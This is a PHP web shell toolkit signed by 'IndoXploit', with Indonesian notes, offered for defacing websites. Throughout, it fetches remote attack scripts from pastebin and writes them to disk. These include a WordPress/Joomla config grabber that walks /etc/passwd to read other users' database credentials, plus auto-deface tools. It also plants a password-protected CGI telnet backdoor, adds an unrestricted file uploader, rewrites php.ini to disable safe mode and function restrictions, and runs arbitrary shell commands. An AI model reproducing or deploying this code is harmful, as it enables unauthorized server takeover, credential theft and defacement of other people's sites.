gabungan tool

<?php
// Tu5b0l3d - IndoXploit
// thx for you.
// http://indoxploit.blogspot.co.id/2016/01/simple-tools-for-deface.html

function parah($pastebin, $nama_file){
	$usa = file_get_contents("$pastebin");
	$frr = fopen("$nama_file", 'w');
	fwrite($frr, $usa);
}
$xp = $_GET[xp];
$b = "Ini merupakan beberapa tool untuk mempermudah dalam hal mendeface ataupun yang lainnya.<br><br>#<br>Tu5b0l3d - IndoXploit";
if($xp == "config_grabber_wp_jm"){
	$config = parah("http://pastebin.com/raw.php?i=deH5eAqP", "config_wp_jm_grabber.php");

		$b = '<h2><a href="config_wp_jm_grabber.php" target="_blank">Config Grabber Wordpress dan joomla</a></h2><br>
		tool ini pertama ambil user dari /etc/passwd, kemudian cek apakah user Readable atau tidak, jika readable Maka akan diambil confignya';

}
elseif($xp == "just_jumping"){
	$jump = parah("http://pastebin.com/raw.php?i=eewrEsJY", "just_jumping.php");

		$b = '<h2><a href="just_jumping.php" target="_blank">Just Jumping</a></h2><br>
		tool jumping ini cuma melihat apakah user readable atau tidak menggunakan fungsi is_readable, jika readable, maka ditampilkan, <br>dan juga nama domainnya akan ditampilkan untuk mempermudah memakai tools yang lainnya.';

	}
	elseif($xp == "pepes_joomla"){
	$pepes_joomla = parah("http://pastebin.com/raw.php?i=50NQdet2", "pepes_joomla.php");

		$b = '<h2><a href="pepes_joomla.php" target="_blank">Auto Deface site cms Joomla</a></h2><br>
		tool ini bisa untuk auto deface jika ente tau nama sitenya, sebelumnya ambil confignya dulu <a href="?xp=config_grabber_wp_jm" target="_blank">disini</a><br>
		video: <a href="https://youtu.be/clvLy5pDA2I" target="_blank">tonton</a>';

	}
	elseif($xp == "pepes_wp"){
		$pepes_wp = parah("http://pastebin.com/raw.php?i=uQWCGPMS", "pepes_wp.php");

		$b = '<h2><a href="pepes_wp.php" target="_blank">Auto Deface site cms Wordpress</a></h2><br>
		tool ini bisa untuk auto deface site berCMS Wordpress, sebelumnya ambil confignya dulu <a href="?xp=config_grabber_wp_jm" target="_blank">disini</a><br>
		video: <a href="https://youtu.be/tWEcMuiqKlo" target="_blank">tonton</a>';

	}
	elseif($xp == "pepes_wp2"){
	$pepes_wp2 = parah("http://pastebin.com/raw.php?i=4rZfJaqE", "pepes_wp2.php");

		$b = '<h2><a href="pepes_wp2.php" target="_blank">Auto Deface site cms Wordpress 2</a></h2><br>
		Tool ini ialah untuk auto Deface site berCMS Wordpress hanya dengan memasukan link config, sebelumnya ambil confignya dulu <a href="?xp=config_grabber_wp_jm" target="_blank">disini</a><br><br>*nb: ingat, masukan Link confignya<br>';

	}

	elseif($xp == "link_title"){
	$link_title = parah("http://pastebin.com/raw.php?i=u69dMjH9", "link_title.php");

		$b = '<h2><a href="link_title.php" target="_blank">Auto Deface site cms Wordpress 2</a></h2><br>
		Tool ini ialah untuk auto Deface site berCMS Wordpress hanya dengan memasukan link config, sebelumnya ambil confignya dulu <a href="?xp=config_grabber_wp_jm" target="_blank">disini</a><br><br>*nb: ingat, masukan Link confignya<br>';

	}

	elseif($xp == "cgi"){
	$dir = mkdir('cgi', 0777);
	$cgi = parah("http://pastebin.com/raw.php?i=XTUFfJLg", "cgi/anu.izo");

                $acces = "AddHandler cgi-script .izo";
				$frr2 = fopen('cgi/.htaccess', 'w');
				fwrite($frr2, $acces);
				chmod("cgi/anu.izo", 0755);


		$b = '<h2><a href="cgi/anu.izo" target="_blank">CGI Telnet</a></h2><br>
		password = indoXploit<br>it\' powerfull, source: <a href="http://www.rohitab.com/cgi-telnet" target="_blank">Rohitab.com</a>';

	}
	elseif($xp == "upload"){
	if($_POST['v']){
if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
$b = "<b>berhasil</b>-->".$_FILES["f"]["name"];
}else{
$b = "<b>gagal</b>";
}
}
else{
	$b = "<form method=post enctype=multipart/form-data><input type=file name=f><input name=v type=submit id=v value=up><br>";
}


	}
	elseif($xp == "bypass"){
	$dir = getcwd();
	$isi = 'safe_mode = off
disable_functions = NONE
';
$buka = fopen($dir.'/php.ini', 'w');
fwrite($buka, $isi);

		$b = '<h2><a href="php.ini" target="_blank">Bypass Disabled Functions</a></h2><br>
		klik link tsb.';

	}


	elseif($xp == "command"){
session_start();
if(empty($_SESSION["dir"]))$_SESSION["dir"]="./";

$a = '<textarea rows="10" cols="100">';
if(isset($_POST['command'])){
isset($_SESSION["dir"])?chdir($_SESSION["dir"]):null;
$cmd=trim($_POST['command']);
if(preg_match("/^cd\s/i",$cmd)){
$pecah=explode(" ",preg_replace("/\s+/"," ",$cmd));
if(@chdir($pecah[1])){
$n="directory changed to $pecah[1]";
$_SESSION["dir"].=$pecah[1]."/";
}
else $n="error cd";
}else $n=shell_exec($_POST['command']);
}else $n='';
$c = "</textarea>";
$b = $a.$n.$c;
	}
	echo '<!DOCTYPE html>
<html>
<head>
	<title>IndoXploit</title>

	<style>
		a{
			text-decoration: none;
		}
		a:hover{
			color: red;
		}
		.kotak{
			border: 1px solid grey;
			width: 200px;
			height: 20px;
			text-align: center;
			border-radius: 3px;
			float: left;
			margin-right: 5px;
		}
		.kotak:hover{
			border: 1px solid red;

		}
		#com{
			margin-right: 70px;
			float: left;
		}

	</style>
</head>
<body>
	<center><h2>Simple Tools by Indo<font color="red">}{</font>ploit</h2></center><hr>
	<div class="kotak"><a href="?xp=just_jumping">Just Jumping</a></div>
	<div class="kotak"><a href="?xp=config_grabber_wp_jm">Config Grabber WP dan Joomla</a></div>
	<div class="kotak"><a href="?xp=pepes_joomla">Auto Deface site cms joomla</a></div>
	<div class="kotak"><a href="?xp=pepes_wp">Auto Deface site Wordpress</a></div>
	<div class="kotak"><a href="?xp=pepes_wp2">Auto Deface site Wordpress 2</a></div>
	<div class="kotak"><a href="?xp=link_title">Title site Wordpress</a></div>

	';

	echo "<br><br><br>$b<br><br><br><br><hr>
</body>
</html>";
if(@ini_get("disable_functions")){
 echo "Disabled Functions = <font color='red'>".@ini_get("disable_functions")."</font>";
}else{
 echo "Disable Functions = None";
}

 if(@ini_get("safe_mode")){echo "<br><br>Safe Mode = <font color='red'>ON<br><br>";}else{ echo "<br><br>Safe Mode = OFF<br><br>";}
 $kernel = shell_exec("uname -a");
 echo "Kernel: <font color='red'>$kernel<br><br>";
 echo '<div class="kotak"><a href="?xp=bypass">Bypass disabled Functions</a></div> <div class="kotak"><a href="?xp=cgi">CGI Telnet</a></div><div class="kotak"><a href="?xp=upload">Upload File</a></div><br><br>';
 echo '<div id="com"><form method="post" action="?xp=command"><input type="text" name="command" placeholder="Command"><input type="submit" value="Go!"></div>';


?>